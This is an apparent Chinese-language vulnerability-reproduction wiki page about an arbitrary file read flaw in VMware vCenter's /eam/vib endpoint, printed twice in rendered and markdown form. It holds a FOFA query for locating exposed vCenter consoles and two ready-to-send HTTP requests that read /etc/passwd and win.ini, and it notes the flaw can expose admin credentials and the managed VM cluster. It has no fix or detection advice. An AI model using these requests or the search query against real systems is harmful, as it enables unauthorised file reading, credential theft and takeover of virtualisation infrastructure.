fofamini-wiki

登录白背景

源码

VMware vCenter vib存在任意文件读取漏洞

一、漏洞简介

VMware vCenter Server是美国威睿（Vmware）公司的一套服务器和虚拟化管理软件。该软件提供了一个用于管理VMware vSphere环境的集中式平台，可自动实施和交付虚拟基础架构。VMware vCenter存在任意文件读取漏洞，远程攻击者通过访问开放在外部的vCenter 控制台，可以任意读取主机上的文件。(可读取 vCenter 配置文件获得管理员账号密码)进而控制 vCenter 平台及其管理的虚拟机集群。

二、影响版本

VMware vCenter

三、资产测绘

fofatitle="ID_VC_Welcome"

四、漏洞复现

GET /eam/vib?id=/etc/passwd HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1

GET /eam/vib?id=C:/windows/win.ini HTTP/1.1
Host: 
Connection: keep-alive
Cache-Control: max-age=0
sec-ch-ua: "Not A(Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9

原文: https://www.yuque.com/xiaokp7/ocvun2/rwx7plpfzw3bu3ia

# VMware vCenter vib存在任意文件读取漏洞

# 一、漏洞简介
VMware vCenter Server是美国威睿（Vmware）公司的一套服务器和虚拟化管理软件。该软件提供了一个用于管理VMware vSphere环境的集中式平台，可自动实施和交付虚拟基础架构。VMware vCenter存在任意文件读取漏洞，远程攻击者通过访问开放在外部的vCenter 控制台，可以任意读取主机上的文件。(可读取 vCenter 配置文件获得管理员账号密码)进而控制 vCenter 平台及其管理的虚拟机集群。

# 二、影响版本

- VMware vCenter

# 三、资产测绘

- fofa`title="ID_VC_Welcome"`

![image.png](./img/DbOBNGNKeVCG9B6b/1716017090282-f90f105e-743a-48cd-bc8c-8043d4492021-199793.png)

# 四、漏洞复现
```
GET /eam/vib?id=/etc/passwd HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1

```
![image.png](./img/DbOBNGNKeVCG9B6b/1716016762787-8d3e9b5c-0e56-4cd9-b541-9283f3d7d128-101649.png)
```
GET /eam/vib?id=C:/windows/win.ini HTTP/1.1
Host: 
Connection: keep-alive
Cache-Control: max-age=0
sec-ch-ua: "Not A(Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9
```
![image.png](./img/DbOBNGNKeVCG9B6b/1716016745760-168356a8-91eb-41d5-888f-26390592baac-293088.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rwx7plpfzw3bu3ia>